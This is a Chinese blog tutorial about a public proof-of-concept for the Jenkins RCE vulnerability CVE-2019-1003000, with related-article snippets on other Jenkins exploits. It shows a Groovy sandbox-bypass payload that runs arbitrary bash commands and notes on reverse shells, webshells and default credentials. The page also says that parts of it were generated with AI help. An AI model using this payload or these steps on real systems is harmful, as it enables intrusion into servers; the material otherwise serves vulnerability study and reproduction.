Jenkins RCE PoC 项目教程

最新推荐文章于 2024-08-20 09:04:02 发布
最新推荐文章于 2024-08-20 09:04:02 发布
阅读量411 收藏 7
点赞数 4
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/gitblog_00122/article/details/141342071

Jenkins RCE PoC 项目教程

cve-2019-1003000-jenkins-rce-pocJenkins RCE Proof-of-Concept: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)项目地址:https://gitcode.com/gh_mirrors/cv/cve-2019-1003000-jenkins-rce-poc

1. 项目的目录结构及介绍

cve-2019-1003000-jenkins-rce-poc/
├── sample-vuln/
│   ├── gitignore
│   ├── LICENSE
│   ├── README.md
│   ├── exploit.py
│   └── requirements.txt
  • sample-vuln/: 包含漏洞利用示例的目录。
    • gitignore: Git 忽略文件配置。
    • LICENSE: 项目许可证文件。
    • README.md: 项目说明文档。
    • exploit.py: 漏洞利用脚本。
    • requirements.txt: 项目依赖文件。

2. 项目的启动文件介绍

项目的启动文件是 exploit.py,这是一个 Python 脚本,用于演示 Jenkins RCE 漏洞的利用。以下是该文件的关键部分:

import argparse
import jenkins
import time
from xml.etree import ElementTree

payload = '''
import org.buildobjects.process.ProcBuilder
@Grab('org.buildobjects:jproc:2.2.3')
class Dummy { }
print new ProcBuilder("/bin/bash").withArgs("-c", "%s").run().getOutputString()
'''

def run_command(url, cmd, job_name, username, password):
    print('[*] Connecting to Jenkins')
    server = jenkins.Jenkins(url, username=username, password=password)
    # 漏洞利用代码

该脚本通过连接到 Jenkins 服务器并执行恶意命令来演示 RCE 漏洞的利用。

3. 项目的配置文件介绍

项目的配置文件主要是 requirements.txt,它列出了运行 exploit.py 脚本所需的 Python 依赖包:

jenkinsapi==0.3.10

这个文件指定了 jenkinsapi 库的版本,确保脚本能够正确运行。

以上是基于开源项目 https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc.git 的教程,涵盖了项目的目录结构、启动文件和配置文件的介绍。

cve-2019-1003000-jenkins-rce-pocJenkins RCE Proof-of-Concept: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)项目地址:https://gitcode.com/gh_mirrors/cv/cve-2019-1003000-jenkins-rce-poc

创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

Jenkins RCE 漏洞复现(CVE-2017-1000353)】
qq_61947585的博客
07-06 485
Jenkins存在未经身份验证的远程代码执行漏洞,经过序列化的Java SignedObject对象传输到基于远程处理的Jenkins CLI,在使用新的对象ObjectInputStream对其进行反序列化操作即可绕过现有的基于黑名单的保护机制。6. 使用 CVE-2017-1000353-SNAPSHOT-all.jar 生成执行反弹 shell 命令的字节码文件 jenkins_poc.ser。这里应该可以监听到,成功反弹shell,但好像机子出现了点问题监听不成功,,
Jenkins RCE 漏洞复现(CVE-2017-1000353、CVE-2018-1000861)
oiadkt的博客
09-21 2538
Jenkins 是软件测试过程中常用的一种持续构建的工具,Jenkins RCE 漏洞触发方式大致分为两种,一种使用 Jenkins CLI 触发,而另一种触发方式为 HTTP 请求触发。这里复现的 CVE-2017-1000353 与 CVE-2018-1000861 就是两种触发方式的代表。
cve-2019-1003000-jenkins-rce-pocJenkins RCE概念证明:SECURITY-1266 CVE-2019-1003000(脚本安全),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明式)
02-05
PoCJenkins RCE SECURITY-1266 / CVE-2019-1003000(脚本安全性),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明性) 一种概念验证,允许具有“总体/读取”权限和“作业/配置”(以及可选的“作业/构建”)的用户绕过沙盒保护,并在Jenkins主节点或节点上执行任意代码。 更新: 的文章解释了利用CVE-2018-1000861和CVE-2019-1003000的漏洞利用链,绕过了对预身份验证RCE的总体/读取权限的需求: : 安装 $ git clone https://github.co
Jenkins RCE CVE-2016-0788分析及利用
Exploit的小站~
05-10 6108
Before Read 本文是去年乌云关站前夕在drops上发表的,但是之后的事情大家都知道,非常仓促,估计很多爬虫没有收录此文,我的blog上居然也没有留下,所以特地翻出来备份一下。 0x00 概述 国外的安全研究人员Moritz Bechler在2月份发现了一处Jenkins远程命令执行漏洞,该漏洞无需登录即可利用,也就是CVE-2016-0788。官方公告是这样描述此漏洞的: ...
Jenkins RCE 漏洞(CVE-2019-1003000) 复现
玄道的网安博客
09-24 3715
影响版本 Pipeline: Declarative Plugin up to and including 1.3.4 Pipeline: Groovy Plugin up to and including 2.61 Script Security Plugin up to and including 1.49 环境搭建 复现漏洞CVE-2019-1003000 (Script Security) 测试环境需要安装docker git clone https://github.com.
CVE-2019-1003000 Jenkins RCE 复现
prettyX的博客
06-18 2062
过程 前提,在Kali下安装好docker 准备漏洞环境 git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc.git cd cve-2019-1003000-jenkins-rce-poc pip install -r requirements.txt cd sample-vuln ./run.sh 在进行完上述命令之后,通过如下命令 docker ps 并未发现docker运行实例 通过查.
Jenkins漏洞(CVE-2017-1000353)复现
qq_62056583的博客
07-05 1075
Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限。网上查找相关资料显示,漏洞经过序列化的Java SignedObject对象传输到基于远程处理的Jenkins CLI,在使用新的对象ObjectInputStream对其进行反序列化操作即可绕过现有的基于黑名单的保护机制。查看tmp目录下是否成功生成,但我的虚拟机中并没有生成相应的数据包,或者说是我的Java环境出的问题(该项实验目前还没成功实现)对生成的字节码文件进行发送,使用预备知识第二条指令。
Jenkins弱口令RCE复现渗透测试
kelenwait的博客
06-20 3314
简介 Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成,Jenkins用Java语言编写,可在Tomcat等流行的servlet容器中运行,也可独立运行。通常与版本管理工具(SCM)、构建工具结合使用。 漏洞复现 1.jenkins存在默认口令使用弱口令登录 admin/admin123 2.找到 Manage Jenkins -Tools and Actions - Script Console 点击
jenkins未授权rce windows主机getshell
m0_46689007的博客
12-11 1538
由于windows环境,反弹shell不方便,试一下远程下载命令,这里面可以用powershell执行下载命令,从上面我们知道的web绝对路径,下载到根目录下。应该是环境原因连接不了webshell,试试windows环境下的反弹shell,因为目标主机可以执行下载命令,我们下载一个nc,访问存在,上传成功。查看”/dashboard/phpinfo.php”,为phpinfo页面,发现为win10系统,win10基本存在Windows Definder。ip先扫一下全端口,发现只有22,80,443。
Jenkins未授权访问RCE漏洞复现
公众号shadow sock7
02-22 1272
修改默认端口: java -jar jenkins.war --ajp13Port=-1 --httpPort=8081
Jenkins RCE 漏洞 PoC 教程
gitblog_00790的博客
08-20 508
Jenkins RCE 漏洞 PoC 教程 cve-2019-1003000-jenkins-rce-pocJenkins RCE Proof-of-Concept: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline...
RCE远程命令执行漏洞详解
一个努力学习网安的小牛马
10-26 575
RCE漏洞的描述危害以及解决方法
Jenkins任意文件读取漏洞(CVE-2018-1999002)
公众号shadow sock7
07-28 3217
在 Windows 下,不存在的目录可以通过 ../ 遍历过去的,而对于 Linux 则不行。那么这个漏洞在 Windows 下是可以任意文件读取的,而在 Linux 下则需要在 Jenkins plugins 目录下存在一个名字中存在 _ 的目录才可以。 感觉比较鸡肋,谁会没事在Jenkins plugins 目录下建一个_的目录? 参考 https://xz.aliyun.com...
Jenkins反序列化代码执行
xmas
05-10 1546
# -*- encoding:utf-8 -*- import socket import base64 import random import urllib2 import time import binascii def random_str(len): str1="" for i in range(len): str1+=(random.choice(
JAVA Apache-CommonsCollections 序列化RCE漏洞分析
u011066706的专栏
04-17 5768
0x00 漏洞背景 2015年11月6日,FoxGlove Security安全团队的@breenmachine 发布的一篇博客中介绍了如何利用Java反序列化漏洞,来攻击最新版的WebLogic、WebSphere、JBoss、Jenkins、OpenNMS这些大名鼎鼎的Java应用,实现远程代码执行。Apache Commons Collections这样的基础库非常多的Java应用都在用,
Jenkins RCE CVE-2019-1003000 漏洞复现
weixin_34102807的博客
02-21 1419
0x00 简述 拥有Overall/Read 权限的用户可以绕过沙盒保护,在jenkins可以执行任意代码CVE-2019-1003000 (Script Security)CVE-2019-1003001 (Pipeline: Groovy)CVE-2019-1003002 (Pipeline: Declarative) 0x01 受影响的版本 Pipeline: Declarative Plu...
高校智慧消防解决方案23P.pdf
最新发布
06-25
智慧消防解决方案
亚马逊的云计算平台AWS.ppt
06-25
亚马逊的云计算平台AWS.ppt
矿井智能物流系统关键技术研究与应用.docx
06-25
矿井智能物流系统关键技术研究与应用
Jenkins与Docker项目实战教程详解
最后,结合标题和描述中的“jenkins教程+docker容器实际项目实战教程”,我们可以推测本教程将着重于如何将Jenkins与Docker结合在一起,在实际项目中实现高效的持续集成和部署。这将包括: - **使用Docker镜像作为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

井唯喜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值